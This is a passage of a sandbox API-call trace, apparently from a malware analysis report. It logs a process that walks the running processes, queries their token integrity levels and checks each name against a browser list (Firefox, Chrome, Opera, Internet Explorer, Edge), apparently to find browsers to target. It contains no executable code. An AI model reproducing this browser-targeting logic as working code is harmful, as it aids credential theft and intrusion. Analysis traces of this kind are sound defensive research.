GetLastError () returned 0x7a [0237.124] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.124] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.124] CloseHandle (hObject=0x340) returned 1 [0237.124] CloseHandle (hObject=0x548) returned 1 [0237.124] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.124] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.124] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.125] GetLastError () returned 0x7a [0237.125] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.125] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.125] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.125] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0237.125] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0237.125] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0237.125] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0237.125] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0237.125] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0237.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0237.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0237.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0237.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0237.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0237.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0237.125] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.125] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.125] GetLastError () returned 0x7a [0237.126] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.126] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.126] CloseHandle (hObject=0x340) returned 1 [0237.126] CloseHandle (hObject=0x548) returned 1 [0237.126] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.126] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.126] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.126] GetLastError () returned 0x7a [0237.126] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.126] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.126] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.126] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0237.126] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0237.126] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0237.126] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0237.126] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0237.126] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0237.126] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.128] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0239.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xbf10) returned 0xc0000004 [0239.140] VirtualAlloc (lpAddress=0x0, dwSize=0xcf10, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0239.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xcf10, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0239.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0239.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0239.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0239.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0239.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0239.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0239.145] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.145] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.145] GetLastError () returned 0x7a [0239.145] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.145] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.145] CloseHandle (hObject=0x340) returned 1 [0239.145] CloseHandle (hObject=0x548) returned 1 [0239.146] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.146] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.146] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.146] GetLastError () returned 0x7a [0239.146] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.146] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.146] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.146] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0239.147] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0239.147] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0239.147] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0239.147] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0239.147] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0239.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0239.147] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.147] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.147] GetLastError () returned 0x7a [0239.147] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.147] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.148] CloseHandle (hObject=0x340) returned 1 [0239.148] CloseHandle (hObject=0x548) returned 1 [0239.148] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.148] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.148] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.148] GetLastError () returned 0x7a [0239.148] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.148] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.149] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.149] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0239.149] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0239.149] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0239.149] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0239.149] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0239.149] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0239.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0239.149] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.149] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.149] GetLastError () returned 0x7a [0239.150] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.150] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.150] CloseHandle (hObject=0x340) returned 1 [0239.150] CloseHandle (hObject=0x548) returned 1 [0239.150] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.150] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.150] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.150] GetLastError () returned 0x7a [0239.151] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.151] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.151] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.151] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0239.151] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0239.151] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0239.151] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0239.151] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0239.151] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0239.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0239.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0239.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0239.152] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.152] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.152] GetLastError () returned 0x7a [0239.152] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.152] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.152] CloseHandle (hObject=0x340) returned 1 [0239.152] CloseHandle (hObject=0x548) returned 1 [0239.152] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.153] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.153] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.153] GetLastError () returned 0x7a [0239.153] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.153] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.153] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.153] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.153] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.153] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0239.154] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.154] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.154] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0239.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0239.154] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.154] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.154] GetLastError () returned 0x7a [0239.154] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.154] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.154] CloseHandle (hObject=0x340) returned 1 [0239.155] CloseHandle (hObject=0x548) returned 1 [0239.155] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.155] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.155] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.155] GetLastError () returned 0x7a [0239.155] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.155] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.155] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.156] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0239.156] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0239.156] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0239.156] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0239.156] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0239.156] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0239.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0239.156] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0239.156] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0239.156] GetLastError () returned 0x7a [0239.156] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0239.157] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0239.157] CloseHandle (hObject=0x340) returned 1 [0239.157] CloseHandle (hObject=0x548) returned 1 [0239.157] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.157] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0239.157] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0239.157] GetLastError () returned 0x7a [0239.157] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0239.158] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0239.158] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0239.158] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0239.158] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0239.158] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0239.158] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0239.158] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0239.158] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0239.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0239.158] OpenProcessToken (in: ProcessHandle=0x548, 